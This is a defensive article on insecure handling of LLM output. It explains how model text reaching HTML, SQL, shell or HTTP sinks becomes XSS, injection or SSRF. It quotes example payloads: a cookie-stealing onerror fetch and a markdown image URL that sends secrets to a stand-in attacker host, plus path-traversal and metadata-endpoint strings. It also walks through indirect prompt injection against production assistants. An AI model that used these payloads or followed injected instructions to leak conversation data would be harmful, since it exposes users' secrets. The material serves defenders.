AI Cybersecurity · 6 min

Insecure Output Handling

Model output is untrusted input to whatever runs it next: render sinks become XSS, generated URLs become SSRF, generated code becomes injection.

You already have a mental slot for this bug. It's the one that holds "never trust user input," except the untrusted party is now a probabilistic text generator that a third party can steer through the prompt. OWASP filed it as LLM02: Insecure Output Handling in the 2023/2024 Top 10 and renamed it LLM05:2025 Improper Output Handling in the current list. The definition is deliberately boring: insufficient validation, sanitization, and handling of the outputs generated by large language models before they are passed downstream to other components and systems.

Here's the useful way to hold it. The model is a data source, not a control plane. Every place your code takes model text and does something with it (renders it, fetches it, executes it, interpolates it into a query) is a trust boundary. The model sits on the far side, and so does anyone who can influence the model: the end user, a poisoned document in your RAG index, a tool that returns attacker-controlled content. The failure isn't that the model "said something bad." The failure is that a downstream component granted the model's text the authority of trusted code.

The two sink families

Group the sinks by what the downstream component does with the bytes.

Render sinks interpret output as markup. The classic case is markdown rendered to HTML in a chat UI. Markdown is not a safe subset of HTML. Most renderers pass through raw <img>, <a>, and sometimes <script> or onerror handlers unless you strip them. So a model that emits <img src=x onerror="fetch('https://evil/'+document.cookie)"> just handed you stored XSS, executing in your origin with your session cookies and CSRF tokens within reach.

The nastier real-world variant needs no <script> at all. Just an image tag, which every markdown app renders by default:

  attacker-controlled text lands in the context
  (via user paste, or indirect: a RAG doc / tool result)
                     │
                     ▼
   model emits:  ![x](https://evil.tld/log?d=<secret from convo>)
                     │  markdown → <img src=...>
                     ▼
        browser auto-fetches the image URL
                     │
                     ▼
   GET https://evil.tld/log?d=api_key_sk-...   ← exfiltration

This is not hypothetical. Johann Rehberger (embracethered.com) demonstrated exactly this data-exfiltration-via-image-markdown against a run of production assistants, including the Azure AI Playground, Bing Chat, ChatGPT, and Claude. The rendered image request carries conversation contents, or anything the model was tricked into copying into the URL, out to an attacker endpoint. No click, no script tag. Image auto-loading is the whole exploit. Fixes rolled out unevenly: image-source allowlisting and Content Security Policy in some products, and in one case a Microsoft mitigation as crude as inserting a space into the markdown so the tag wouldn't parse as an image.

Exec sinks feed output to something that runs it. OWASP's scenario list is the checklist here: model text into a shell via os.system or exec(); model-written SQL run unparameterized; model output built into a filesystem path (../../etc/passwd, path traversal); model-generated code passed to eval(). Each is a textbook injection where the injected string happens to originate from the model. Add SSRF: an agent that fetches a URL the model produced will happily hit http://169.254.169.254/latest/meta-data/ and read cloud credentials off the metadata endpoint. The generated URL is untrusted, but your HTTP client treats it as intent.

Builder: Trace every path from a model response to a sink and name the interpreter on the other end: HTML parser, SQL engine, shell, HTTP client, eval. If output reaches an interpreter without an encoding or validation step matched to that interpreter, that's the bug. "We told the model in the system prompt not to do X" is not a control. It's a request.

A worked exec example

Text-to-SQL feature. The model turns "top 5 customers by spend" into SQL you execute:

sql = llm(f"Write SQLite for: {user_question}")
rows = db.execute(sql).fetchall()   # sink

Prompt injection lives in user_question, and even without malice the model can emit DROP TABLE, stacked statements, or a correlated subquery that reads a table this user shouldn't see. You cannot parameterize a query the model authored, because parameterization protects values, not whole statements. So the boundary has to be structural. Run under a read-only connection as a least-privilege role that can only see permitted views. Parse the generated SQL and reject anything but a single SELECT. Cap rows and wall-clock time. The model proposes; a deterministic validator with real authority disposes.

Defender: Assume the injection already succeeded and put the control at the sink. A SELECT-only readonly DB role turns a model-authored DELETE into a database error instead of an incident. The shape repeats everywhere: allowlist image and link hosts at the render sink; pin HTTP egress to an allowlist and block link-local and RFC-1918 ranges at the SSRF sink; never exec generated code outside a sandbox with no network and no secrets.

What actually goes wrong

  • Markdown feels safe, so it isn't sanitized. Teams HTML-escape user messages, then render the model's markdown to raw HTML. That asymmetry is exactly what the image-exfil attacks exploited.
  • The channel isn't the browser. Output rendered in a Slack or Teams unfurl, a mobile webview, or an email template is still a render sink, often with weaker CSP than your main app.
  • Encode once, in the wrong context. HTML-escaping output that then lands inside a JavaScript string literal or a URL parameter is the wrong encoder, and XSS survives. Encoding has to match the destination grammar.
  • The tool loop hides the sink. In an agent, model text becomes a tool argument becomes a shell command a few frames down the stack, where nobody is thinking about output validation anymore. This is where Insecure Output Handling meets Excessive Agency (LLM06): untrusted output plus broad tool permissions is how a chat turn becomes remote code execution.

The defensive spine

Two rules cover most of it.

  1. Treat model output as untrusted user input. Zero-trust. Apply the same validation you'd apply to a form field from the open internet. OWASP says this outright.
  2. Encode and validate at the sink, in that sink's grammar. Context-aware HTML/JS/URL encoding for render sinks; parameterized queries and least-privilege roles for SQL; sandboxing and egress allowlists for exec sinks; a strict Content Security Policy as the render-sink backstop, so an escaped <img> still can't phone home. Log outputs and watch for anomalies.
model output ─► [ validate/encode @ sink ] ─► interpreter
                        ▲
        matched to THIS grammar: HTML | SQL | shell | URL
Researcher: The interesting surface is indirect. The attacker isn't the user, they're the author of a document your RAG pipeline retrieves or a web page your agent reads. The payload sits dormant in the corpus, and the model surfaces it into a render or exec sink on some future query. Measure exfil bandwidth per sink: a single markdown image URL leaks a couple KB of query string per turn, which is plenty for an API key.

Sanitize where the mess lands, and give the model no more trust than the least-trusted party who can influence its tokens.

Sources

Insecure Output Handling — All About LLMs, from AI to Z · AdversariaLLM